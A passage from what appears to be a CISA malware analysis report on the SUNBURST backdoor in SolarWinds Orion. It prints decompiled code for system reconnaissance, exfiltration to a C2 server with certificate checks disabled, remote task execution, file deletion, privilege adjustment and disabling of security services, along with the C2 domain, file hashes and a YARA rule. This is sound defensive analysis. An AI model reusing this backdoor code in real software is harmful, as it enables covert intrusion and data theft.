+\r\nEnvironment.UserName;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nOrionImprovementBusinessLayer.GetOSVersion(true);\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 11 of 30\n\nEnvironment.SystemDirectory;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) +\r\n(object) (int) TimeSpan.FromMilliseconds((double) (uint)\r\nEnvironment.TickCount).TotalDays;\r\nresult = result + OrionImprovementBusinessLayer.Job.GetDescriptionId(ref i) + info\r\n+ \"\\n\";\r\nresult += OrionImprovementBusinessLayer.GetNetworkAdapterConfiguration();\r\n}\r\nThe GetNetworkAdapterConfiguration function will gather information on any attached network adapters and their\r\nconfiguration information.\r\nprivate static string GetNetworkAdapterConfiguration()\r\n{\r\nstring str = \"\";\r\ntry\r\n{\r\nusing (ManagementObjectSearcher managementObjectSearcher = new\r\nManagementObjectSearcher(OrionImprovementBusinessLayer.ZipHelper.Unzip(Select *\r\nFrom Win32_NetworkAdapterConfiguration where IPEnabled=true)))\r\n{\r\nforeach (ManagementObject managementObject in\r\nmanagementObjectSearcher.Get().Cast\u003cManagementObject\u003e())\r\n{\r\nstr += \"\\n\";\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(Description));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(MACAddress));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPEnabled));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DHCPServer));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSHostName));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSDomainSuffixSearchOrder));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DNSServerSearchOrder));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(IPAddress));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(IPSubnet));\r\nstr +=\r\nOrionImprovementBusinessLayer.GetManagementObjectProperty(managementObject,\r\nOrionImprovementBusinessLayer.ZipHelper.Unzip(DefaultIPGateway));\r\n}\r\nreturn str;\r\n}\r\n}\r\ncatch (Exception ex)\r\n{\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 12 of 30\n\nreturn str + ex.Message;\r\n}\r\n**UPLOAD SYSTEM INFORMATION**\r\nThe “UploadSystemDescription” function is used to exfiltrate gathered system information. It parses through HTTP session\r\ninformation to form a full HTTP request that is sent to the remote C2 server. The modified version of the FNV-1a hash\r\nalgorithm is utilized to hash certain words associated with outbound HTTP requests, such as “accept” (Hash:\r\n2734787258623754862) and “content-type” (Hash: 6116246686670134098). It then parses through the provided HTTP\r\nsession data using these hash values, rather than HTTP strings, to obfuscate the functionality of this code. This obfuscation\r\nmakes it more difficult to manually or heuristically identify the functions intent to generate an outbound HTTP session.\r\n--Begin UploadSystemDescription Function--\r\npublic static void UploadSystemDescription(string[] args, out string result, IWebProxy proxy)\r\n    {\r\n       result = (string) null;\r\n       string requestUriString = args[0];\r\n       string s1 = args[1];\r\n       string s2 = args.Length \u0026gt;= 3 ? args[2] : (string) null;\r\n       string[] strArray = Encoding.UTF8.GetString(Convert.FromBase64String(s1)).Split(new string[3]\r\n       {\r\n        \"\\r\\n\",\r\n        \"\\r\",\r\n        \"\\n\"\r\n       }, StringSplitOptions.None);\r\n       HttpWebRequest httpWebRequest1 = (HttpWebRequest) WebRequest.Create(requestUriString);\r\n       HttpWebRequest httpWebRequest2 = httpWebRequest1;\r\n       httpWebRequest2.set_ServerCertificateValidationCallback(httpWebRequest2.get_ServerCertificateValidationCallback()\r\n+ (RemoteCertificateValidationCallback) ((sender, cert, chain, sslPolicyErrors) =\u0026gt; true));\r\n       httpWebRequest1.Proxy = proxy;\r\n       httpWebRequest1.Timeout = 120000;\r\n       httpWebRequest1.Method = strArray[0].Split(' ')[0];\r\n       foreach (string header in strArray)\r\n       {\r\n        int length = header.IndexOf(':');\r\n        if (length \u0026gt; 0)\r\n        {\r\n           string headerName = header.Substring(0, length);\r\n           string s3 = header.Substring(length + 1).TrimStart((char[]) Array.Empty\u0026lt;char\u0026gt;());\r\n           if (!WebHeaderCollection.IsRestricted(headerName))\r\n           {\r\n            httpWebRequest1.Headers.Add(header);\r\n           }\r\n           else\r\n           {\r\n            switch (OrionImprovementBusinessLayer.GetHash(headerName.ToLower()))\r\n            {\r\n               case 2734787258623754862:\r\n                httpWebRequest1.Accept = s3;\r\n                continue;\r\n               case 6116246686670134098:\r\n                httpWebRequest1.ContentType = s3;\r\n                continue;\r\n               case 7574774749059321801:\r\n                httpWebRequest1.UserAgent = s3;\r\n                continue;\r\n               case 8873858923435176895:\r\n                if (OrionImprovementBusinessLayer.GetHash(s3.ToLower()) == 1475579823244607677UL)\r\n                {\r\n                   httpWebRequest1.ServicePoint.Expect100Continue = true;\r\n                   continue;\r\n                }\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 13 of 30\n\nhttpWebRequest1.Expect = s3;\r\n                continue;\r\n               case 9007106680104765185:\r\n                httpWebRequest1.Referer = s3;\r\n                continue;\r\n               case 11266044540366291518:\r\n                ulong hash = OrionImprovementBusinessLayer.GetHash(s3.ToLower());\r\n                httpWebRequest1.KeepAlive = hash == 13852439084267373191UL || httpWebRequest1.KeepAlive;\r\n                httpWebRequest1.KeepAlive = hash != 14226582801651130532UL \u0026amp;\u0026amp; httpWebRequest1.KeepAlive;\r\n                continue;\r\n               case 15514036435533858158:\r\n                httpWebRequest1.set_Date(DateTime.Parse(s3));\r\n                continue;\r\n               case 16066522799090129502:\r\n                httpWebRequest1.set_Date(DateTime.Parse(s3));\r\n                continue;\r\n               default:\r\n                continue;\r\n            }\r\n--End UploadSystemDescription Function--\r\nSUNBURST contains functions that give it the ability to run specified tasks, terminate processes, delete files, compute file\r\nhashes, and reboot the victim system.\r\n**RUN SPECIFIED TASKS**\r\nThe \"ExecuteEngine\" is a core function that uses the “job” variable to carry out certain tasks for the adversary. This function\r\nhas the ability to run tasks that could consist of command line arguments, alter the registry (to maintain persistence, etc.),\r\ncollect a detailed description of the target platform, kill tasks, delete files, add files, or even execute a secondary payload:\r\n--Begin ExecuteEngine Function--\r\nprivate int ExecuteEngine(\r\n       OrionImprovementBusinessLayer.HttpHelper.JobEngine job,\r\n       string cl,\r\n       out string result)\r\n    {\r\n       result = (string) null;\r\n       int num = 0;\r\n       string[] args = OrionImprovementBusinessLayer.Job.SplitString(cl);\r\n       try\r\n       {\r\n        if (job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.ReadRegistryValue || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.SetRegistryValue || (job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteRegistryValue || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetRegistrySubKeyAndValueNames))\r\n           num = OrionImprovementBusinessLayer.HttpHelper.AddRegistryExecutionEngine(job, args, out result);\r\n        switch (job)\r\n        {\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.SetTime:\r\n            int delay;\r\n            OrionImprovementBusinessLayer.Job.SetTime(args, out delay);\r\n            this.delay = delay;\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.CollectSystemDescription:\r\n            OrionImprovementBusinessLayer.Job.CollectSystemDescription(this.proxy.ToString(), out result);\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.UploadSystemDescription:\r\n            OrionImprovementBusinessLayer.Job.UploadSystemDescription(args, out result, this.proxy.GetWebProxy());\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.RunTask:\r\n            num = OrionImprovementBusinessLayer.Job.RunTask(args, cl, out result);\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.GetProcessByDescription:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 14 of 30\n\nOrionImprovementBusinessLayer.Job.GetProcessByDescription(args, out result);\r\n            break;\r\n           case OrionImprovementBusinessLayer.HttpHelper.JobEngine.KillTask:\r\n            OrionImprovementBusinessLayer.Job.KillTask(args);\r\n            break;\r\n        }\r\n        return job == OrionImprovementBusinessLayer.HttpHelper.JobEngine.WriteFile || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.FileExists || (job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.DeleteFile || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileHash) || job ==\r\nOrionImprovementBusinessLayer.HttpHelper.JobEngine.GetFileSystemEntries ?\r\nOrionImprovementBusinessLayer.HttpHelper.AddFileExecutionEngine(job, args, out result) : num;\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        if (!string.IsNullOrEmpty(result))\r\n           result += \"\\n\";\r\n        result += ex.Message;\r\n        return ex.HResult;\r\n       }\r\n--End ExecuteEngine function--\r\n**TERMINATE PROCESSES**\r\n    public static void KillTask(string[] args) =\u0026gt;\r\nProcess.GetProcessById(int.Parse(args[0])).Kill();\r\n**DELETE FILE**\r\n    public static void DeleteFile(string[] args) =\u0026gt;\r\nSystem.IO.File.Delete(Environment.ExpandEnvironmentVariables(args[0]));\r\n**COMPUTE FILE HASHES**\r\n    public static int GetFileHash(string[] args, out string result)\r\n    {\r\n       result = (string) null;\r\n       string path = Environment.ExpandEnvironmentVariables(args[0]);\r\n       using (MD5 md5 = MD5.Create())\r\n       {\r\n        using (FileStream fileStream = System.IO.File.OpenRead(path))\r\n        {\r\n           byte[] hash = md5.ComputeHash((Stream) fileStream);\r\n           if (args.Length \u0026gt; 1)\r\n            return !(OrionImprovementBusinessLayer.ByteArrayToHexString(hash).ToLower() == args[1].ToLower()) ? 1 : 0;\r\n           result = OrionImprovementBusinessLayer.ByteArrayToHexString(hash);\r\n        }\r\n       }\r\n       return 0;\r\n    }\r\n**REBOOT SYSTEM**\r\npublic static bool RebootComputer()\r\n    {\r\n       bool flag = false;\r\n       try\r\n       {\r\n        bool previousState = false;\r\n        string privilege = OrionImprovementBusinessLayer.ZipHelper.Unzip(ph2eifo3n5utg1j8d94qrvbmk0sal76c);\r\n        if (!OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, true, out previousState))\r\n           return flag;\r\n        flag = OrionImprovementBusinessLayer.NativeMethods.InitiateSystemShutdownEx((string) null, (string) null, 0U,\r\ntrue, true, 2147745794U);\r\n        OrionImprovementBusinessLayer.NativeMethods.SetProcessPrivilege(privilege, previousState, out previousState);\r\n        return flag;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 15 of 30\n\n}\r\n       catch (Exception ex)\r\n       {\r\n        return flag;\r\n       }\r\n    }\r\n--End additional functions Function--\r\n**ADJUST PROCESS PRIVILEGES**\r\nThe SetProcessPrivilege function is used to adjust privileges for a target process on the victim system. For example, a\r\nprocess may need increased system level privileges to accomplish its designed task.\r\n--Begin SetProcessPrivilege Function--\r\npublic static bool SetProcessPrivilege(\r\n       string privilege,\r\n       bool newState,\r\n       out bool previousState)\r\n    {\r\n       bool flag = false;\r\n       previousState = false;\r\n       try\r\n       {\r\n        IntPtr zero = IntPtr.Zero;\r\n        OrionImprovementBusinessLayer.NativeMethods.LUID Luid = new\r\nOrionImprovementBusinessLayer.NativeMethods.LUID();\r\n        Luid.LowPart = 0U;\r\n        Luid.HighPart = 0U;\r\n        if\r\n(!OrionImprovementBusinessLayer.NativeMethods.OpenProcessToken(OrionImprovementBusinessLayer.NativeMethods.GetCurrentProcess(),\r\nTokenAccessLevels.Query | TokenAccessLevels.AdjustPrivileges, ref zero))\r\n           return false;\r\n        if (!OrionImprovementBusinessLayer.NativeMethods.LookupPrivilegeValue((string) null, privilege, ref Luid))\r\n        {\r\n           OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);\r\n           return false;\r\n        }\r\n        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE NewState = new\r\nOrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();\r\n        OrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE PreviousState = new\r\nOrionImprovementBusinessLayer.NativeMethods.TOKEN_PRIVILEGE();\r\n        NewState.PrivilegeCount = 1U;\r\n        NewState.Privilege.Luid = Luid;\r\n        NewState.Privilege.Attributes = newState ? 2U : 0U;\r\n        uint ReturnLength = 0;\r\n        OrionImprovementBusinessLayer.NativeMethods.AdjustTokenPrivileges(zero, false, ref NewState, (uint)\r\nMarshal.SizeOf((object) PreviousState), ref PreviousState, ref ReturnLength);\r\n        previousState = (PreviousState.Privilege.Attributes \u0026amp; 2U) \u0026gt; 0U;\r\n        flag = true;\r\n        OrionImprovementBusinessLayer.NativeMethods.CloseHandle(zero);\r\n        return flag;\r\n       }\r\n       catch (Exception ex)\r\n       {\r\n        return flag;\r\n       }\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct LUID\r\n    {\r\n       public uint LowPart;\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 16 of 30\n\npublic uint HighPart;\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct LUID_AND_ATTRIBUTES\r\n    {\r\n       public OrionImprovementBusinessLayer.NativeMethods.LUID Luid;\r\n       public uint Attributes;\r\n    }\r\n    [StructLayout(LayoutKind.Sequential, CharSet = CharSet.Unicode)]\r\n    private struct TOKEN_PRIVILEGE\r\n    {\r\n       public uint PrivilegeCount;\r\n       public OrionImprovementBusinessLayer.NativeMethods.LUID_AND_ATTRIBUTES Privilege;\r\n    }\r\n   }\r\n--End SetProcessPrivilege Function--\r\n**BLOCK LIST CHECKING FUNCTIONS**\r\nThe Update function is critical to starting the SUNBURST C2 functionality. Early in its execution, the Update function calls\r\nthe UpdateNotification() function. If that returns a “False”, indicating one of the hard-coded block list processes is running,\r\nthe SUNBURST malware will not initiate its C2 session. The malicious class “OrionImprovementBusinessLayer”,\r\ncontaining the SUNBURST module, will effectively be disabled. However, the parent SolarWinds process running the\r\nmalicious DLL 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77 will not be interrupted.\r\n--Begin Update Function--\r\n   private static void Update()\r\n   {\r\n    bool flag1 = false;\r\n    OrionImprovementBusinessLayer.CryptoHelper cryptoHelper = new\r\nOrionImprovementBusinessLayer.CryptoHelper(OrionImprovementBusinessLayer.userId,\r\nOrionImprovementBusinessLayer.domain4);\r\n    OrionImprovementBusinessLayer.HttpHelper http = (OrionImprovementBusinessLayer.HttpHelper) null;\r\n    Thread thread = (Thread) null;\r\n    bool last = true;\r\n    OrionImprovementBusinessLayer.AddressFamilyEx addressFamilyEx =\r\nOrionImprovementBusinessLayer.AddressFamilyEx.Unknown;\r\n    int num1 = 0;\r\n    bool flag2 = true;\r\n    OrionImprovementBusinessLayer.DnsRecords rec = new OrionImprovementBusinessLayer.DnsRecords();\r\n    Random random = new Random();\r\n    int num2 = 0;\r\n    if (!OrionImprovementBusinessLayer.UpdateNotification())\r\n       return;\r\n    OrionImprovementBusinessLayer.svcListModified2 = false;\r\n    for (int index = 1; index \u0026lt;= 3 \u0026amp;\u0026amp; !flag1; ++index)\r\n    {\r\n       OrionImprovementBusinessLayer.DelayMin(rec.A, rec.A);\r\n       if (!OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))\r\n       {\r\n        if (OrionImprovementBusinessLayer.svcListModified1)\r\n           flag2 = true;\r\n        num1 = OrionImprovementBusinessLayer.svcListModified2 ? num1 + 1 : 0;\r\n        string hostName;\r\n        switch (OrionImprovementBusinessLayer.status)\r\n        {\r\n           case OrionImprovementBusinessLayer.ReportStatus.New:\r\n            hostName = addressFamilyEx == OrionImprovementBusinessLayer.AddressFamilyEx.Error ?\r\ncryptoHelper.GetCurrentString() : cryptoHelper.GetPreviousString(out last);\r\n            break;\r\n           case OrionImprovementBusinessLayer.ReportStatus.Append:\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 17 of 30\n\nhostName = flag2 ? cryptoHelper.GetNextStringEx(rec.dnssec) : cryptoHelper.GetNextString(rec.dnssec);\r\n            break;\r\n           default:\r\n            goto label_27;\r\n        }\r\n--End Update Function--\r\nThe UpdateNotification() function will return a \"False\" if any process on the hard coded blocklist is running on the target\r\nsystem. It utilizes the TrackProcess function detailed below. It call the TrackProcesses function.\r\n--Begin UpdateNotification Function--\r\nprivate static bool UpdateNotification()\r\n   {\r\n    int num = 3;\r\n    while (num-- \u0026gt; 0)\r\n    {\r\n       OrionImprovementBusinessLayer.DelayMin(0, 0);\r\n       if (OrionImprovementBusinessLayer.ProcessTracker.TrackProcesses(true))\r\n        return false;\r\n       if (OrionImprovementBusinessLayer.DnsHelper.CheckServerConnection(OrionImprovementBusinessLayer.apiHost))\r\n        return true;\r\n    }\r\n    return false;\r\n   }\r\n--End UpdateNotification Function--\r\nThe \"TrackProcesses\" function queries a list of running processes on the target system and then passes the process names to\r\nthe \"SearchAssemblies\" function, which hashes their process names and compares the result hashes to the hard-coded\r\nprocess hash list stored in the list \"assemblyTimeStamps.\" If any of the target processes are running, the function will return\r\nTrue. It also searches for certain services and attempts to disable them.\r\n--Begin TrackProcesses Function--\r\npublic static bool TrackProcesses(bool full)\r\n    {\r\n       Process[] processes = Process.GetProcesses();\r\n       if (OrionImprovementBusinessLayer.ProcessTracker.SearchAssemblies(processes))\r\n        return true;\r\n       bool flag = OrionImprovementBusinessLayer.ProcessTracker.SearchServices(processes);\r\n       return !flag \u0026amp; full ? OrionImprovementBusinessLayer.ProcessTracker.SearchConfigurations() : flag;\r\n    }\r\n--End TrackProcesses Function--\r\nThe \"SearchAssemblies\" function called by TrackProcesses, is used to enumerate running processes to determine if any of\r\nthe hashed processes, included within the process blocklist are currently running on the target system.\r\n--Begin SearchAssemblies Function—\r\nprivate static bool SearchAssemblies(Process[] processes)\r\n    {\r\n       for (int index = 0; index \u0026lt; processes.Length; ++index)\r\n       {\r\n        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());\r\n        if (Array.IndexOf\u0026lt;ulong\u0026gt;(OrionImprovementBusinessLayer.assemblyTimeStamps, hash) != -1)\r\n           return true;\r\n       }\r\n       return false;\r\n    }\r\n--End SearchAssemblies Function--\r\nThe SearchServices\" function, called by TrackProcesses, searches running services to determine whether or not they are\r\nrunning any of the hard-coded block list target process hashes. It attempts to disable these services.\r\n--Begin SearchServices Function--\r\nprivate static bool SearchServices(Process[] processes)\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 18 of 30\n\n{\r\n       for (int index = 0; index \u0026lt; processes.Length; ++index)\r\n       {\r\n        ulong hash = OrionImprovementBusinessLayer.GetHash(processes[index].ProcessName.ToLower());\r\n        foreach (OrionImprovementBusinessLayer.ServiceConfiguration svc in OrionImprovementBusinessLayer.svcList)\r\n        {\r\n           if (Array.IndexOf\u0026lt;ulong\u0026gt;(svc.timeStamps, hash) != -1)\r\n           {\r\n            object obj = OrionImprovementBusinessLayer.ProcessTracker._lock;\r\n            bool flag = false;\r\n            try\r\n            {\r\n               Monitor.Enter(obj, ref flag);\r\n               if (!svc.running)\r\n               {\r\n                OrionImprovementBusinessLayer.svcListModified1 = true;\r\n                OrionImprovementBusinessLayer.svcListModified2 = true;\r\n                svc.running = true;\r\n               }\r\n               if (!svc.disabled)\r\n               {\r\n                if (!svc.stopped)\r\n                {\r\n                   if (svc.Svc.Length != 0)\r\n                   {\r\n                    OrionImprovementBusinessLayer.DelayMin(0, 0);\r\n                    OrionImprovementBusinessLayer.ProcessTracker.SetManualMode(svc.Svc);\r\n                    svc.disabled = true;\r\n                    svc.stopped = true;\r\n                   }\r\n                }\r\n               }\r\n            }\r\n            finally\r\n            {\r\n               if (flag)\r\n                Monitor.Exit(obj);\r\n            }\r\n--End SearchServices Function--\r\nScreenshots\r\nFigure 1 - The modified module with a new class function named \"OrionImprovementBusinessLayer.\"\r\nFigure 2 - The code snippet contains the subdomains and other strings used to construct the C2 domains.\r\navsvmcloud.com\r\nTags\r\ncommand-and-control\r\nWhois\r\nDomain Name: avsvmcloud.com\r\nRegistry Domain ID: 2289718834_DOMAIN_COM-VRSN\r\nRegistrar WHOIS Server: whois.godaddy.com\r\nRegistrar URL: http://www.godaddy.com\r\nUpdated Date: 2020-10-08T13:58:35Z\r\nCreation Date: 2018-07-25T11:38:29Z\r\nRegistrar Registration Expiration Date: 2023-07-25T11:38:29Z\r\nRegistrar: GoDaddy.com, LLC\r\nRegistrar IANA ID: 146\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 19 of 30\n\nRegistrar Abuse Contact Email: abuse@godaddy.com\r\nRegistrar Abuse Contact Phone: +1.4806242505\r\nDomain Status: clientTransferProhibited http://www.icann.org/epp#clientTransferProhibited\r\nDomain Status: clientUpdateProhibited http://www.icann.org/epp#clientUpdateProhibited\r\nDomain Status: clientRenewProhibited http://www.icann.org/epp#clientRenewProhibited\r\nDomain Status: clientDeleteProhibited http://www.icann.org/epp#clientDeleteProhibited\r\nRegistry Registrant ID: Not Available From Registry\r\nRegistrant Name: Registration Private\r\nRegistrant Organization: Domains By Proxy, LLC\r\nRegistrant Street: DomainsByProxy.com\r\nRegistrant Street: 14455 N. Hayden Road\r\nRegistrant City: Scottsdale\r\nRegistrant State/Province: Arizona\r\nRegistrant Postal Code: 85260\r\nRegistrant Country: US\r\nRegistrant Phone: +1.4806242599\r\nRegistrant Phone Ext:\r\nRegistrant Fax: +1.4806242598\r\nRegistrant Fax Ext:\r\nRegistrant Email: avsvmcloud.com@domainsbyproxy.com\r\nRegistry Admin ID: Not Available From Registry\r\nAdmin Name: Registration Private\r\nAdmin Organization: Domains By Proxy, LLC\r\nAdmin Street: DomainsByProxy.com\r\nAdmin Street: 14455 N. Hayden Road\r\nAdmin City: Scottsdale\r\nAdmin State/Province: Arizona\r\nAdmin Postal Code: 85260\r\nAdmin Country: US\r\nAdmin Phone: +1.4806242599\r\nAdmin Phone Ext:\r\nAdmin Fax: +1.4806242598\r\nAdmin Fax Ext:\r\nAdmin Email: avsvmcloud.com@domainsbyproxy.com\r\nRegistry Tech ID: Not Available From Registry\r\nTech Name: Registration Private\r\nTech Organization: Domains By Proxy, LLC\r\nTech Street: DomainsByProxy.com\r\nTech Street: 14455 N. Hayden Road\r\nTech City: Scottsdale\r\nTech State/Province: Arizona\r\nTech Postal Code: 85260\r\nTech Country: US\r\nTech Phone: +1.4806242599\r\nTech Phone Ext:\r\nTech Fax: +1.4806242598\r\nTech Fax Ext:\r\nTech Email: avsvmcloud.com@domainsbyproxy.com\r\nName Server: PDNS09.DOMAINCONTROL.COM\r\nName Server: PDNS10.DOMAINCONTROL.COM\r\nDNSSEC: unsigned\r\nURL of the ICANN WHOIS Data Problem Reporting System: http://wdprs.internic.net/\r\n\u003e\u003e\u003e Last update of WHOIS database: 2020-12-14T19:00:00Z \u003c\u003c\u003c\r\nRelationships\r\navsvmcloud.com Connected_From 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nDescription\r\nThe subdomain for \"SolarWinds.Orion.Core.BusinessLayer.dll.\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 20 of 30\n\nd0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nTags\r\ndropper\r\nDetails\r\nName SolarWinds-Core-v2019.4.5220-Hotfix5.msp\r\nSize 214831104 bytes\r\nType\r\nComposite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Title: Installation Database, Subje\r\nOrion Core Services 2019.4, Author: SolarWinds Worldwide, LLC., Keywords: Installer, Comments: This installer database contains th\r\nrequired to install SolarWinds Orion Core Services 2019.4., Create Time/Date: Tue Mar 24 11:55:04 2020, Name of Creating Applicatio\r\nInstaller XML Toolset (3.9.1208.0), Security: 4, Template: Intel;1033, Last Saved By: Intel;1033, Revision Number: {079A74C5-95D0\r\nB8EAF0A29654}119.4.20161.5220;{079A74C5-95D0-446E-86F7-B8EAF0A29654}119.4.20161.5220;{DA36F8E2-99FC-44DF-B01\r\n09F6B063B0F7}, Number of Pages: 200, Number of Characters: 152174623\r\nMD5 02af7cec58b9a5da1c542b5a32151ba1\r\nSHA1 1b476f58ca366b54f34d714ffce3fd73cc30db1a\r\nSHA256 d0d626deb3f9484e649294a8dfa814c5568f846d5aa02d4cdad5d041a29d5600\r\nSHA512 f40fd5d94791f18eed59dc78d12acc52f4a65dfdf8c819d6957de8059e0e127160e0a21320845340932a54f9c639c42b2c815558b2d0cec11\r\nssdeep 3145728:yMbnCpAK7nuv7xYiq0bC4zheqeRHuCieBVZNP7WJOQeXt+9riYBaeIBjSxTusL:yMbCp7uf3GnqfCVrNPgLrW4GoxSG\r\nEntropy 7.998885\r\nAntivirus\r\nNo matches found.\r\nYARA Rules\r\nNo matches found.\r\nssdeep Matches\r\nNo matches found.\r\nRelationships\r\nd0d626deb3... Contains 32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\r\nDescription\r\nThis file is a Microsoft Windows Installer Patch file that has been identified as a SUNBURST installer named \"SolarWinds-Core-v2019.4.5220-Hotfix5.msp.\" This file contains legitimate SolarWinds Orion update components, the modified DLL\r\n\"SolarWinds.Orion.Core.BusinessLayer.dll\" (32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77)\r\nand a legitimate configuration file.\r\nThe hotfix is typically delivered to the SolarWinds Orion application as an update for the\r\n\"SolarWinds.Orion.Core.BusinessLayer.dll\" module. In this case, when the update is applied, it will overwrite the non-malicious module, replacing it with the trojanized version and providing the attacker with the same level of access as\r\ndescribed in the analysis of \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77.\"\r\nce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nTags\r\nbackdoortrojan\r\nDetails\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 21 of 30\n\nName SolarWinds.Orion.Core.BusinessLayer.dll\r\nSize 1028072 bytes\r\nType PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows\r\nMD5 846e27a652a5e1bfbd0ddd38a16dc865\r\nSHA1 d130bd75645c2433f88ac03e73395fba172ef676\r\nSHA256 ce77d116a074dab7a22a0fd4f2c1ab475f16eec42e1ded3c0b0aa8211fe858d6\r\nSHA512 c26e275b4232be844f6c4062a4f42413099452085060ed4080b880b52800428cd32f69271c98977fa979a89355fbb3b485855ca3d51499bc\r\nssdeep 12288:5JKoHwfn/jz3bbO4Qag2I97PMieSLezPKT+BYvjenWHuhh9c0g8vkzK19Q:vEfDbO97P8TrK0YbenWH4c0g8vkzK19\r\nEntropy 5.580054\r\nAntivirus\r\nAhnlab Backdoor/Win32.SunBurst\r\nAntiy Trojan[Backdoor]/MSIL.Agent\r\nAvira TR/Sunburst.A\r\nBitDefender Trojan.Sunburst.A\r\nClamav Win.Countermeasure.Sunburst-9809152-0\r\nComodo Backdoor\r\nCyren W32/MSIL_SunBurst.A.gen!Eldorado\r\nESET a variant of MSIL/SunBurst.A trojan\r\nEmsisoft Trojan.Win32.Sunburst (A)\r\nIkarus Backdoor.Sunburst\r\nK7 Trojan ( 00574a531 )\r\nLavasoft Trojan.Sunburst.A\r\nMcAfee Trojan-sunburst\r\nMicrosoft Security Essentials Trojan:MSIL/Solorigate.BR!dha\r\nNANOAV Trojan.Win32.SunBurst.iduxyv\r\nSophos Mal/Sunburst-A\r\nSymantec Backdoor.Sunburst\r\nSystweak trojan-backdoor.sunburst-r\r\nTrendMicro Backdoo.6F8C6A1E\r\nTrendMicro House Call Backdoo.6F8C6A1E\r\nVirusBlokAda TScope.Trojan.MSIL\r\nZillya! Trojan.SunBurst.Win32.1\r\nYARA Rules\r\nrule CISA_10318927_01 : trojan rat SOLAR_FIRE\r\n{\r\n   meta:\r\n       Author = \"CISA Code \u0026 Media Analysis\"\r\n       Incident = \"10318927\"\r\n       Date = \"2020-12-13\"\r\nhttps://us-cert.cisa.gov/ncas/analysis-reports/ar21-039a\r\nPage 22 of 30\n\nLast_Modified = \"20201213_2145\"\r\n       Actor = \"n/a\"\r\n       Category = \"TROJAN RAT\"\r\n       Family = \"SOLAR_FIRE\"\r\n       Description = \"This signature is based off of unique strings embedded within the modified Solar Winds app\"\r\n       MD5_1 = \"b91ce2fa41029f6955bff20079468448\"\r\n       SHA256_1 = \"32519b85c0b422e4656de6e6c41878e95fd95026267daab4215ee59c107d6c77\"\r\n       